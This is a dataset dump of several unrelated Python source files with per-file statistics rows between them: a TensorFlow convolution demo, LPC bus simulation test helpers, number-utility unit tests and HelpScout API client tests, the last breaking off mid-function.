import tensorflow as tf
# todo http://www.cnblogs.com/welhzh/p/6607581.html

# Demo of tf.nn.conv2d output shapes with VALID padding (TF1 session API).
sess = tf.InteractiveSession()

# Renamed `input`/`filter` -> `input_tensor`/`kernel`: the originals shadowed
# the Python builtins input() and filter().
# 1x1x5x1 kernel over a 1x3x3x5 input: spatial dims preserved -> (1, 3, 3, 1)
input_tensor = tf.Variable(tf.random_normal([1, 3, 3, 5]))
kernel = tf.Variable(tf.random_normal([1, 1, 5, 1]))
op = tf.nn.conv2d(input_tensor, kernel, strides=[1, 1, 1, 1], padding='VALID')
sess.run(tf.global_variables_initializer())
print(sess.run(op).shape)

# 3x3x5x1 kernel, VALID padding: spatial dims collapse -> (1, 1, 1, 1)
input_tensor = tf.Variable(tf.random_normal([1, 3, 3, 5]))
kernel = tf.Variable(tf.random_normal([3, 3, 5, 1]))
op = tf.nn.conv2d(input_tensor, kernel, strides=[1, 1, 1, 1], padding='VALID')
sess.run(tf.global_variables_initializer())
print(sess.run(op).shape)
print(sess.run(op))
| 26.125
| 71
| 0.711324
| 109
| 627
| 4.018349
| 0.330275
| 0.031963
| 0.109589
| 0.164384
| 0.746575
| 0.746575
| 0.744292
| 0.744292
| 0.744292
| 0.744292
| 0
| 0.064685
| 0.087719
| 627
| 23
| 72
| 27.26087
| 0.701049
| 0.090909
| 0
| 0.615385
| 0
| 0
| 0.017637
| 0
| 0
| 0
| 0
| 0.043478
| 0
| 1
| 0
| false
| 0
| 0.076923
| 0
| 0.076923
| 0.230769
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7dedb0117d1be905df8ae3f0566a0d766c72b378
| 8,641
|
py
|
Python
|
tests/helpers.py
|
mikey/lpcperipheral
|
ef2f91127c14f9f49759f614f512f3b79f659327
|
[
"Apache-2.0"
] | 2
|
2021-10-05T01:23:56.000Z
|
2021-10-05T14:34:51.000Z
|
tests/helpers.py
|
mikey/lpcperipheral
|
ef2f91127c14f9f49759f614f512f3b79f659327
|
[
"Apache-2.0"
] | 1
|
2021-10-10T23:15:11.000Z
|
2021-10-10T23:15:11.000Z
|
tests/helpers.py
|
mikey/lpcperipheral
|
ef2f91127c14f9f49759f614f512f3b79f659327
|
[
"Apache-2.0"
] | 3
|
2021-10-05T01:28:22.000Z
|
2021-10-08T13:45:32.000Z
|
import unittest
# 4-bit LPC START-field values driven on LAD while LFRAME# is asserted
# (values per the LPC bus spec — FWRD/FWWR are the firmware-memory cycles).
START_IO = 0b0000
START_FWRD = 0b1101
START_FWWR = 0b1110
# Cycle-type/direction nibble for I/O cycles (driven after START).
CYCLE_IOWRITE = 0b0010
CYCLE_IOREAD = 0b0000
# SYNC-field values the peripheral drives during the sync phase.
SYNC_READY = 0b0000
SYNC_SHORT_WAIT = 0b0101
SYNC_LONG_WAIT = 0b0110
class Helpers:
    """Simulation helpers mixed into TestCase subclasses.

    Each method is a simulation generator: every bare ``yield`` advances the
    simulated clock one cycle, ``yield sig.eq(v)`` drives a signal, and
    ``(yield sig)`` samples one.  Statement order therefore IS the bus
    timing — do not reorder.
    """

    def wishbone_write(self, wb, addr, data, sel=1, delay=1):
        """Perform one Wishbone write and assert ack after `delay` cycles."""
        yield wb.adr.eq(addr)
        yield wb.dat_w.eq(data)
        yield wb.we.eq(1)
        yield wb.cyc.eq(1)
        yield wb.stb.eq(1)
        yield wb.sel.eq(sel)
        # clock
        yield
        for i in range(delay):
            # clock
            yield
        self.assertEqual((yield wb.ack), 1)
        # Deassert strobes to end the cycle.
        yield wb.we.eq(0)
        yield wb.cyc.eq(0)
        yield wb.stb.eq(0)
        yield wb.sel.eq(0)
        # Shouldn't need to clear dat and adr, so leave them set

    def wishbone_read(self, wb, addr, expected, sel=1, delay=1):
        """Perform one Wishbone read and assert dat_r equals `expected`."""
        yield wb.adr.eq(addr)
        yield wb.cyc.eq(1)
        yield wb.stb.eq(1)
        yield wb.we.eq(0)
        yield wb.sel.eq(sel)
        # clock
        yield
        for i in range(delay):
            # clock
            yield
        self.assertEqual((yield wb.ack), 1)
        self.assertEqual((yield wb.dat_r), expected)
        yield wb.cyc.eq(0)
        yield wb.stb.eq(0)
        yield wb.sel.eq(0)
        # Shouldn't need to clear dat and adr, so leave it

    # Partial transaction. Useful to test reset cases
    def lpc_io_read_partial(self, lpc, cycles):
        """Start an LPC I/O read but abandon it after `cycles` clock cycles."""
        # Once driven things should start moving
        yield lpc.lframe.eq(0)
        yield lpc.lad_in.eq(START_IO)
        yield
        yield lpc.lframe.eq(1)
        yield lpc.lad_in.eq(CYCLE_IOREAD)
        for _ in range(cycles):
            yield

    def lpc_io_write(self, lpc, addr, data):
        """Drive a full LPC I/O write of `data` to 16-bit `addr`, checking
        lad_en turnaround and SYNC behaviour along the way."""
        # Once driven things should start moving
        yield lpc.lframe.eq(0)
        yield lpc.lad_in.eq(START_IO)
        yield
        # NOTE(review): START is driven for two cycles here (lpc_io_read only
        # drives one) — presumably deliberate to test an extended LFRAME#;
        # confirm against the DUT's start-detection logic.
        yield lpc.lframe.eq(0)
        yield lpc.lad_in.eq(START_IO)
        yield
        yield lpc.lframe.eq(1)
        yield lpc.lad_in.eq(CYCLE_IOWRITE)
        yield
        # 16 bits of addr, little endian, least significant nibble first
        for i in reversed(range(0, 16, 4)):
            x = (addr >> i) & 0xf
            yield lpc.lad_in.eq(x)
            yield
        # 8 bits of data, big endian, most significant nibble first
        for i in range(0, 8, 4):
            x = (data >> i) & 0xf
            yield lpc.lad_in.eq(x)
            yield
        # TAR1 2 cycles: host hands the bus over; peripheral must not drive LAD.
        yield lpc.lad_in.eq(0x1) # eyecatcher
        yield
        self.assertEqual((yield lpc.lad_en), 0)
        yield lpc.lad_in.eq(0x2) # eyecatcher
        yield
        self.assertEqual((yield lpc.lad_en), 0)
        # Sync cycles: spin while the peripheral signals long-wait.
        yield
        while (yield lpc.lad_out) == SYNC_LONG_WAIT:
            lad = yield lpc.lad_out
            # print("Write SYNC wait: LAD:0x%x" % (lad))
            self.assertEqual((yield lpc.lad_en), 1)
            yield
        self.assertEqual((yield lpc.lad_en), 1)
        self.assertEqual((yield lpc.lad_out), SYNC_READY)
        # TAR2 2 cycles: peripheral drives 0b1111 then releases the bus.
        yield
        self.assertEqual((yield lpc.lad_out), 0b1111)
        self.assertEqual((yield lpc.lad_en), 1)
        yield lpc.lad_in.eq(0xa) # eyecatcher
        yield
        self.assertEqual((yield lpc.lad_en), 0)

    def lpc_io_read(self, lpc, addr, data):
        """Drive a full LPC I/O read from 16-bit `addr` and assert the
        peripheral returns `data` nibble by nibble."""
        # Once driven things should start moving
        yield lpc.lframe.eq(0)
        yield lpc.lad_in.eq(START_IO)
        yield
        yield lpc.lframe.eq(1)
        yield lpc.lad_in.eq(CYCLE_IOREAD)
        yield
        # 16 bits of addr, little endian, least significant nibble first
        for i in reversed(range(0, 16, 4)):
            x = (addr >> i) & 0xf
            yield lpc.lad_in.eq(x)
            yield
        # TAR1 2 cycles: peripheral must not drive LAD yet.
        yield lpc.lad_in.eq(0x1) # eyecatcher
        yield
        self.assertEqual((yield lpc.lad_en), 0)
        yield lpc.lad_in.eq(0x2) # eyecatcher
        yield
        self.assertEqual((yield lpc.lad_en), 0)
        # Sync cycles: spin while the peripheral signals long-wait.
        yield
        while (yield lpc.lad_out) == SYNC_LONG_WAIT:
            lad = yield lpc.lad_out
            # print("Read SYNC wait: LAD:0x%x" % (lad))
            self.assertEqual((yield lpc.lad_en), 1)
            yield
        self.assertEqual((yield lpc.lad_en), 1)
        self.assertEqual((yield lpc.lad_out), SYNC_READY)
        # 8 bits of data, big endian, most significant nibble first
        for i in range(0, 8, 4):
            yield
            x = (data >> i) & 0xf
            self.assertEqual((yield lpc.lad_out), x)
            self.assertEqual((yield lpc.lad_en), 1)
        # TAR2 2 cycles: peripheral drives 0b1111 then releases the bus.
        yield
        self.assertEqual((yield lpc.lad_en), 1)
        self.assertEqual((yield lpc.lad_out), 0b1111)
        yield lpc.lad_in.eq(0xa) # eyecatcher
        yield
        self.assertEqual((yield lpc.lad_en), 0)

    def lpc_fw_write(self, lpc, addr, data, size):
        """Drive an LPC firmware-memory write of `size` bytes (1, 2 or 4)
        of `data` to 28-bit `addr`."""
        assert ((size == 4) | (size == 2) | (size == 1))
        # Once driven things should start moving
        yield lpc.lframe.eq(0)
        yield lpc.lad_in.eq(START_FWWR)
        yield
        yield lpc.lframe.eq(1)
        yield lpc.lad_in.eq(0) # IDSEL
        yield
        # 28 bits of addr, little endian, least significant nibble first
        for i in reversed(range(0, 28, 4)):
            x = (addr >> i) & 0xf
            yield lpc.lad_in.eq(x)
            yield
        # msize encoding. size is in byte
        if (size == 1):
            yield lpc.lad_in.eq(0b0000)
        elif (size == 2):
            yield lpc.lad_in.eq(0b0001)
        elif (size == 4):
            yield lpc.lad_in.eq(0b0010)
        else:
            assert(0)
        yield
        # size*8 bits of data, most significant nibble first within each step
        for i in range(0, size*8, 4):
            x = (data >> i) & 0xf
            yield lpc.lad_in.eq(x)
            yield
        # TAR1 2 cycles: peripheral must not drive LAD yet.
        yield lpc.lad_in.eq(0x1) # eyecatcher
        yield
        self.assertEqual((yield lpc.lad_en), 0)
        yield lpc.lad_in.eq(0x2) # eyecatcher
        yield
        self.assertEqual((yield lpc.lad_en), 0)
        # Sync cycles: spin while the peripheral signals long-wait.
        yield
        while (yield lpc.lad_out) == SYNC_LONG_WAIT:
            lad = yield lpc.lad_out
            # print("Write SYNC wait: LAD:0x%x" % (lad))
            self.assertEqual((yield lpc.lad_en), 1)
            yield
        self.assertEqual((yield lpc.lad_en), 1)
        self.assertEqual((yield lpc.lad_out), SYNC_READY)
        # TAR2 2 cycles: peripheral drives 0b1111 then releases the bus.
        yield
        self.assertEqual((yield lpc.lad_en), 1)
        self.assertEqual((yield lpc.lad_out), 0b1111)
        yield lpc.lad_in.eq(0xa) # eyecatcher
        yield
        self.assertEqual((yield lpc.lad_en), 0)

    def lpc_fw_read(self, lpc, addr, data, size):
        """Drive an LPC firmware-memory read of `size` bytes (1, 2 or 4)
        from 28-bit `addr` and assert the peripheral returns `data`."""
        assert ((size == 4) | (size == 2) | (size == 1))
        # Once driven things should start moving
        yield lpc.lframe.eq(0)
        yield lpc.lad_in.eq(START_FWRD)
        yield
        yield lpc.lframe.eq(1)
        yield lpc.lad_in.eq(0) # IDSEL
        yield
        # 28 bits of addr, little endian, least significant nibble first
        for i in reversed(range(0, 28, 4)):
            x = (addr >> i) & 0xf
            yield lpc.lad_in.eq(x)
            yield
        # msize encoding. size is in byte
        if (size == 1):
            yield lpc.lad_in.eq(0b0000)
        elif (size == 2):
            yield lpc.lad_in.eq(0b0001)
        elif (size == 4):
            yield lpc.lad_in.eq(0b0010)
        else:
            assert(0)
        yield
        # TAR1 2 cycles: peripheral must not drive LAD yet.
        yield lpc.lad_in.eq(0x1) # eyecatcher
        yield
        self.assertEqual((yield lpc.lad_en), 0)
        yield lpc.lad_in.eq(0x2) # eyecatcher
        yield
        self.assertEqual((yield lpc.lad_en), 0)
        # Sync cycles: spin while the peripheral signals long-wait.
        yield
        while (yield lpc.lad_out) == SYNC_LONG_WAIT:
            lad = yield lpc.lad_out
            # print("Read SYNC wait: LAD:0x%x" % (lad))
            self.assertEqual((yield lpc.lad_en), 1)
            yield
        self.assertEqual((yield lpc.lad_en), 1)
        self.assertEqual((yield lpc.lad_out), SYNC_READY)
        # size*8 bits of data, checked one nibble per cycle
        for i in range(0, size*8, 4):
            yield
            x = (data >> i) & 0xf
            self.assertEqual((yield lpc.lad_out), x)
            self.assertEqual((yield lpc.lad_en), 1)
        # TAR2 2 cycles: peripheral drives 0b1111 then releases the bus.
        yield
        self.assertEqual((yield lpc.lad_out), 0b1111)
        self.assertEqual((yield lpc.lad_en), 1)
        yield lpc.lad_in.eq(0xa) # eyecatcher
        yield
        self.assertEqual((yield lpc.lad_en), 0)
| 29.592466
| 72
| 0.550631
| 1,215
| 8,641
| 3.812346
| 0.098765
| 0.15544
| 0.187608
| 0.178756
| 0.912781
| 0.908895
| 0.908895
| 0.908895
| 0.905225
| 0.905225
| 0
| 0.044276
| 0.343942
| 8,641
| 291
| 73
| 29.694158
| 0.772799
| 0.161208
| 0
| 0.884615
| 0
| 0
| 0
| 0
| 0
| 0
| 0.008339
| 0
| 0.206731
| 1
| 0.033654
| false
| 0
| 0.004808
| 0
| 0.043269
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
81736bc4f859d16bee6a6e3bbf2f625942560a21
| 18
|
py
|
Python
|
contrib/python/parso/py2/tests/normalizer_issue_files/allowed_syntax_python2.py
|
jochenater/catboost
|
de2786fbc633b0d6ea6a23b3862496c6151b95c2
|
[
"Apache-2.0"
] | 6,989
|
2017-07-18T06:23:18.000Z
|
2022-03-31T15:58:36.000Z
|
contrib/python/parso/py2/tests/normalizer_issue_files/allowed_syntax_python2.py
|
jochenater/catboost
|
de2786fbc633b0d6ea6a23b3862496c6151b95c2
|
[
"Apache-2.0"
] | 1,978
|
2017-07-18T09:17:58.000Z
|
2022-03-31T14:28:43.000Z
|
contrib/python/parso/py2/tests/normalizer_issue_files/allowed_syntax_python2.py
|
jochenater/catboost
|
de2786fbc633b0d6ea6a23b3862496c6151b95c2
|
[
"Apache-2.0"
] | 1,228
|
2017-07-18T09:03:13.000Z
|
2022-03-29T05:57:40.000Z
|
's' b''
u's' b'ä'
| 6
| 9
| 0.333333
| 6
| 18
| 1
| 0.666667
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.222222
| 18
| 2
| 10
| 9
| 0.428571
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
81ddae66b5a379a55356e856e919f1d88a55a6c9
| 3,349
|
py
|
Python
|
tests/lib/bes/common/test_number_util.py
|
reconstruir/bes
|
82ff54b2dadcaef6849d7de424787f1dedace85c
|
[
"Apache-2.0"
] | null | null | null |
tests/lib/bes/common/test_number_util.py
|
reconstruir/bes
|
82ff54b2dadcaef6849d7de424787f1dedace85c
|
[
"Apache-2.0"
] | null | null | null |
tests/lib/bes/common/test_number_util.py
|
reconstruir/bes
|
82ff54b2dadcaef6849d7de424787f1dedace85c
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
#-*- coding:utf-8; mode:python; indent-tabs-mode: nil; c-basic-offset: 2; tab-width: 2 -*-
import unittest
from bes.common.number_util import number_util
from bes.system.compat import compat
class Testnumber_util(unittest.TestCase):
def test_int_to_base2(self):
self.assertEqual( '1', number_util.int_to_base2(1) )
self.assertEqual( '10', number_util.int_to_base2(2) )
self.assertEqual( '11', number_util.int_to_base2(3) )
self.assertEqual( '0001', number_util.int_to_base2(1, 4) )
self.assertEqual( '0010', number_util.int_to_base2(2, 4) )
self.assertEqual( '0011', number_util.int_to_base2(3, 4) )
self.assertEqual( '001', number_util.int_to_base2(1, 3) )
self.assertEqual( '010', number_util.int_to_base2(2, 3) )
self.assertEqual( '011', number_util.int_to_base2(3, 3) )
self.assertEqual( '01', number_util.int_to_base2(1, 2) )
self.assertEqual( '10', number_util.int_to_base2(2, 2) )
self.assertEqual( '11', number_util.int_to_base2(3, 2) )
self.assertEqual( '1', number_util.int_to_base2(1, 1) )
self.assertEqual( '10', number_util.int_to_base2(2, 1) )
self.assertEqual( '11', number_util.int_to_base2(3, 1) )
self.assertEqual( '1', number_util.int_to_base2(1, 0) )
self.assertEqual( '10', number_util.int_to_base2(2, 0) )
self.assertEqual( '11', number_util.int_to_base2(3, 0) )
def test_is_int(self):
self.assertEqual( True, number_util.is_int(5) )
self.assertEqual( False, number_util.is_int(5.5) )
self.assertEqual( True, number_util.is_int(-5) )
self.assertEqual( False, number_util.is_int('5') )
self.assertEqual( False, number_util.is_int('5.5') )
self.assertEqual( False, number_util.is_int('-5') )
self.assertEqual( False, number_util.is_int(u'5') )
self.assertEqual( False, number_util.is_int(u'5.5') )
self.assertEqual( False, number_util.is_int(u'-5') )
if compat.IS_PYTHON2:
self.assertEqual( True, number_util.is_int(long(5)) )
self.assertEqual( True, number_util.is_int(long(-5)) )
def test_string_is_int(self):
self.assertEqual( True, number_util.string_is_int(5) )
self.assertEqual( False, number_util.string_is_int(5.5) )
self.assertEqual( True, number_util.string_is_int(-5) )
self.assertEqual( True, number_util.string_is_int('5') )
self.assertEqual( False, number_util.string_is_int('5.5') )
self.assertEqual( True, number_util.string_is_int('-5') )
self.assertEqual( True, number_util.string_is_int(u'5') )
self.assertEqual( False, number_util.string_is_int(u'5.5') )
self.assertEqual( True, number_util.string_is_int(u'-5') )
def test_to_int(self):
self.assertEqual( 5, number_util.to_int(5) )
self.assertEqual( None, number_util.to_int(5.5) )
self.assertEqual( -5, number_util.to_int(-5) )
self.assertEqual( 5, number_util.to_int('5') )
self.assertEqual( None, number_util.to_int('5.5') )
self.assertEqual( -5, number_util.to_int('-5') )
self.assertEqual( 5, number_util.to_int(u'5') )
self.assertEqual( None, number_util.to_int(u'5.5') )
self.assertEqual( -5, number_util.to_int(u'-5') )
if compat.IS_PYTHON2:
self.assertEqual( 5, number_util.to_int(long(5)) )
self.assertEqual( -5, number_util.to_int(long(-5)) )
# Allow running this test module directly: `python test_number_util.py`.
if __name__ == "__main__":
    unittest.main()
| 44.065789
| 90
| 0.697522
| 532
| 3,349
| 4.112782
| 0.114662
| 0.23309
| 0.190128
| 0.1234
| 0.811243
| 0.811243
| 0.743601
| 0.743144
| 0.719378
| 0.496344
| 0
| 0.051453
| 0.14691
| 3,349
| 75
| 91
| 44.653333
| 0.714386
| 0.032547
| 0
| 0.032787
| 0
| 0
| 0.02656
| 0
| 0
| 0
| 0
| 0
| 0.803279
| 1
| 0.065574
| false
| 0
| 0.04918
| 0
| 0.131148
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
81e193d53c57c9ca2f22b2f46dcdbeb71ebfc639
| 40,652
|
py
|
Python
|
tests/helpscout/test_client.py
|
santiher/python-helpscout-v2
|
d1cfba119e0f87da9de9798304e1969a75a48189
|
[
"MIT"
] | 4
|
2019-08-28T11:58:59.000Z
|
2022-03-16T23:39:40.000Z
|
tests/helpscout/test_client.py
|
santiher/python-helpscout-v2
|
d1cfba119e0f87da9de9798304e1969a75a48189
|
[
"MIT"
] | 3
|
2019-08-28T17:34:27.000Z
|
2019-10-15T08:54:34.000Z
|
tests/helpscout/test_client.py
|
santiher/python-helpscout-v2
|
d1cfba119e0f87da9de9798304e1969a75a48189
|
[
"MIT"
] | 3
|
2021-06-10T21:23:12.000Z
|
2021-09-20T22:09:17.000Z
|
from functools import partial
from unittest import main, TestCase
from unittest.mock import call, MagicMock, patch, PropertyMock
from helpscout.client import EmbeddedKey, HelpScout, HelpScoutEndpointRequester
from helpscout.exceptions import (HelpScoutException,
HelpScoutAuthenticationException,
HelpScoutRateLimitExceededException)
class TestClient(TestCase):
app_id = 'app_id'
app_secret = 'app_secret'
url = 'http://helpscout.com/api/'
sleep = True
seconds = 3
def _get_client(
self, app_id=app_id, app_secret=app_secret, url=url, sleep=sleep,
seconds=seconds, token=None):
hs = HelpScout(app_id, app_secret, url, sleep, seconds)
hs.access_token = token
return hs
def test_init(self):
hs = self._get_client()
self.assertEqual(hs.app_id, self.app_id)
self.assertEqual(hs.app_secret, self.app_secret)
self.assertEqual(hs.base_url, self.url)
self.assertEqual(hs.sleep_on_rate_limit_exceeded, self.sleep)
self.assertEqual(hs.rate_limit_sleep, self.seconds)
self.assertEqual(hs.access_token, None)
def test_get_objects_dict_params(self):
endpoint, params = 'users', {'id': '10', 'name': 'Mike'}
hs = self._get_client()
with patch('helpscout.client.HelpScoutObject') as HelpScoutObject, \
patch('helpscout.client.HelpScout.hit_') as hit:
HelpScoutObject.cls.return_value = cls = MagicMock()
hit.return_value = hit_return = 9
hs.get_objects(endpoint, params=params)
HelpScoutObject.cls.assert_called_with(endpoint, endpoint)
hit.assert_called_with(endpoint, 'get', None, params=params)
cls.from_results.assert_called_with(hit_return)
def test_get_objects_str_params(self):
endpoint, params = 'users', 'id=10&name=Mike'
hs = self._get_client()
with patch('helpscout.client.HelpScoutObject') as HelpScoutObject, \
patch('helpscout.client.HelpScout.hit_') as hit:
HelpScoutObject.cls.return_value = cls = MagicMock()
hit.return_value = hit_return = 9
hs.get_objects(endpoint, params=params)
HelpScoutObject.cls.assert_called_with(endpoint, endpoint)
hit.assert_called_with(endpoint, 'get', None, params=params)
cls.from_results.assert_called_with(hit_return)
def test_get_objects_no_params(self):
endpoint, params = 'users', None
hs = self._get_client()
with patch('helpscout.client.HelpScoutObject') as HelpScoutObject, \
patch('helpscout.client.HelpScout.hit_') as hit:
HelpScoutObject.cls.return_value = cls = MagicMock()
hit.return_value = hit_return = 9
hs.get_objects(endpoint, params)
HelpScoutObject.cls.assert_called_with(endpoint, endpoint)
hit.assert_called_with(endpoint, 'get', None, params=params)
cls.from_results.assert_called_with(hit_return)
def test_get_objects_resource_id(self):
user = {'id': '10', 'name': 'Mike'}
endpoint, resource_id = 'users', 10
hs = self._get_client()
with patch('helpscout.client.HelpScoutObject') as HelpScoutObject, \
patch('helpscout.client.HelpScout.hit_') as hit:
HelpScoutObject.cls.return_value = cls = MagicMock()
cls.from_results.return_value = [user]
hit.return_value = hit_return = user
data = hs.get_objects(endpoint, resource_id=resource_id)
HelpScoutObject.cls.assert_called_with(endpoint, endpoint)
hit.assert_called_with(endpoint, 'get', 10, params=None)
cls.from_results.assert_called_with(hit_return)
self.assertEqual(data, user)
def test_hit_no_access_token_ok(self):
endpoint, method = 'users', 'get'
full_url = self.url + endpoint
hs_path = 'helpscout.client.HelpScout.'
hs = self._get_client()
with patch('helpscout.client.requests') as requests, \
patch('helpscout.client.logger'), \
patch(hs_path + '_authenticate') as auth, \
patch(hs_path + '_authentication_headers') as auth_headers, \
patch(hs_path + '_results_with_pagination') as pages:
# Setup
auth_headers.return_value = headers = {'token': 'abc'}
response = requests.get.return_value = MagicMock()
response.ok = True
response.json.return_value = json_response = {'a': 'b'}
list(hs.hit_(endpoint, method))
# Asserts
auth.assert_called_once()
auth_headers.assert_called_once()
requests.get.assert_called_once_with(
full_url, headers=headers, json=None)
response.json.assert_called_once()
pages.assert_called_once_with(json_response, method)
def test_hit_ok(self):
endpoint, method = 'users', 'get'
full_url = self.url + endpoint
hs_path = 'helpscout.client.HelpScout.'
hs = self._get_client(token='abc')
with patch('helpscout.client.requests') as requests, \
patch('helpscout.client.logger') as logger, \
patch(hs_path + '_authenticate') as auth, \
patch(hs_path + '_authentication_headers') as auth_headers, \
patch(hs_path + '_results_with_pagination') as pages:
# Setup
auth_headers.return_value = headers = {'token': 'abc'}
response = requests.get.return_value = MagicMock()
response.ok = True
response.json.return_value = json_response = {'a': 'b'}
response.status_code = 200
list(hs.hit_(endpoint, method))
# Asserts
auth.assert_not_called()
auth_headers.assert_called_once()
log_msg_body = method + ' ' + full_url
self.assertEqual(
logger.debug.call_args_list,
[call('Request: ' + log_msg_body),
call('Received: ' + log_msg_body + ' (True - 200)'),
]
)
requests.get.assert_called_once_with(
full_url, headers=headers, json=None)
response.json.assert_called_once()
pages.assert_called_once_with(json_response, method)
def test_hit_resource_id_ok(self):
endpoint, method, resource_id = 'users', 'get', 4
full_url = self.url + endpoint + '/' + str(resource_id)
hs_path = 'helpscout.client.HelpScout.'
hs = self._get_client(token='abc')
with patch('helpscout.client.requests') as requests, \
patch('helpscout.client.logger') as logger, \
patch(hs_path + '_authenticate') as auth, \
patch(hs_path + '_authentication_headers') as auth_headers, \
patch(hs_path + '_results_with_pagination') as pages:
# Setup
auth_headers.return_value = headers = {'token': 'abc'}
response = requests.get.return_value = MagicMock()
response.ok = True
response.json.return_value = json_response = {'a': 'b'}
response.status_code = 200
ret = list(hs.hit_(endpoint, method, resource_id))
# Asserts
auth.assert_not_called()
auth_headers.assert_called_once()
log_msg_body = method + ' ' + full_url
self.assertEqual(
logger.debug.call_args_list,
[call('Request: ' + log_msg_body),
call('Received: ' + log_msg_body + ' (True - 200)'),
]
)
requests.get.assert_called_once_with(
full_url, headers=headers, json=None)
response.json.assert_called_once()
pages.assert_not_called()
self.assertEqual(ret, [json_response])
def test_hit_params_dict_ok(self):
params, params_str = {'embed': 'threads'}, '?embed=threads'
endpoint, method = 'users', 'get'
full_url = self.url + endpoint + params_str
hs_path = 'helpscout.client.HelpScout.'
hs = self._get_client(token='abc')
with patch('helpscout.client.requests') as requests, \
patch('helpscout.client.logger') as logger, \
patch(hs_path + '_authenticate') as auth, \
patch(hs_path + '_authentication_headers') as auth_headers, \
patch(hs_path + '_results_with_pagination') as pages:
# Setup
auth_headers.return_value = headers = {'token': 'abc'}
response = requests.get.return_value = MagicMock()
response.ok = True
response.json.return_value = json_response = {'a': 'b'}
response.status_code = 200
list(hs.hit_(endpoint, method, None, params=params))
# Asserts
auth.assert_not_called()
auth_headers.assert_called_once()
log_msg_body = method + ' ' + full_url
self.assertEqual(
logger.debug.call_args_list,
[call('Request: ' + log_msg_body),
call('Received: ' + log_msg_body + ' (True - 200)'),
]
)
requests.get.assert_called_once_with(
full_url, headers=headers, json=None)
response.json.assert_called_once()
pages.assert_called_once_with(json_response, method)
def test_hit_resource_id_with_params_dict_ok(self):
params, params_str = {'embed': 'threads'}, '?embed=threads'
endpoint, method, resource_id = 'users', 'get', 4
full_url = self.url + endpoint + '/' + str(resource_id) + params_str
hs_path = 'helpscout.client.HelpScout.'
hs = self._get_client(token='abc')
with patch('helpscout.client.requests') as requests, \
patch('helpscout.client.logger') as logger, \
patch(hs_path + '_authenticate') as auth, \
patch(hs_path + '_authentication_headers') as auth_headers, \
patch(hs_path + '_results_with_pagination') as pages:
# Setup
auth_headers.return_value = headers = {'token': 'abc'}
response = requests.get.return_value = MagicMock()
response.ok = True
response.json.return_value = json_response = {'a': 'b'}
response.status_code = 200
ret = list(hs.hit_(endpoint, method, resource_id, params=params))
# Asserts
auth.assert_not_called()
auth_headers.assert_called_once()
log_msg_body = method + ' ' + full_url
self.assertEqual(
logger.debug.call_args_list,
[call('Request: ' + log_msg_body),
call('Received: ' + log_msg_body + ' (True - 200)'),
]
)
requests.get.assert_called_once_with(
full_url, headers=headers, json=None)
response.json.assert_called_once()
pages.assert_not_called()
self.assertEqual(ret, [json_response])
def test_hit_resource_id_with_params_str_ok(self):
params_str = 'embed=threads'
endpoint, method, resource_id = 'users', 'get', 4
full_url = (self.url + endpoint + '/' + str(resource_id) + '?' +
params_str)
hs_path = 'helpscout.client.HelpScout.'
hs = self._get_client(token='abc')
with patch('helpscout.client.requests') as requests, \
patch('helpscout.client.logger') as logger, \
patch(hs_path + '_authenticate') as auth, \
patch(hs_path + '_authentication_headers') as auth_headers, \
patch(hs_path + '_results_with_pagination') as pages:
# Setup
auth_headers.return_value = headers = {'token': 'abc'}
response = requests.get.return_value = MagicMock()
response.ok = True
response.json.return_value = json_response = {'a': 'b'}
response.status_code = 200
ret = list(
hs.hit_(endpoint, method, resource_id, params=params_str))
# Asserts
auth.assert_not_called()
auth_headers.assert_called_once()
log_msg_body = method + ' ' + full_url
self.assertEqual(
logger.debug.call_args_list,
[call('Request: ' + log_msg_body),
call('Received: ' + log_msg_body + ' (True - 200)'),
]
)
requests.get.assert_called_once_with(
full_url, headers=headers, json=None)
response.json.assert_called_once()
pages.assert_not_called()
self.assertEqual(ret, [json_response])
def test_hit_post_ok(self):
endpoint, method = 'users', 'post'
full_url = self.url + endpoint
hs_path = 'helpscout.client.HelpScout.'
hs = self._get_client(token='abc')
with patch('helpscout.client.requests') as requests, \
patch('helpscout.client.logger') as logger, \
patch(hs_path + '_authenticate') as auth, \
patch(hs_path + '_authentication_headers') as auth_headers, \
patch(hs_path + '_results_with_pagination') as pages:
# Setup
auth_headers.return_value = headers = {'token': 'abc'}
response = requests.post.return_value = MagicMock()
response.status_code = 201
response.ok = True
response.json.return_value = {'a': 'b'}
ret = list(hs.hit_(endpoint, method))
# Asserts
auth.assert_not_called()
auth_headers.assert_called_once()
log_msg_body = method + ' ' + full_url
self.assertEqual(
logger.debug.call_args_list,
[call('Request: ' + log_msg_body),
call('Received: ' + log_msg_body + ' (True - 201)'),
]
)
requests.post.assert_called_once_with(
full_url, headers=headers, json=None)
response.json.assert_not_called()
pages.assert_not_called()
self.assertEqual(ret, [None])
def test_hit_delete_ok(self):
endpoint, method = 'users', 'delete'
full_url = self.url + endpoint
hs_path = 'helpscout.client.HelpScout.'
hs = self._get_client(token='abc')
with patch('helpscout.client.requests') as requests, \
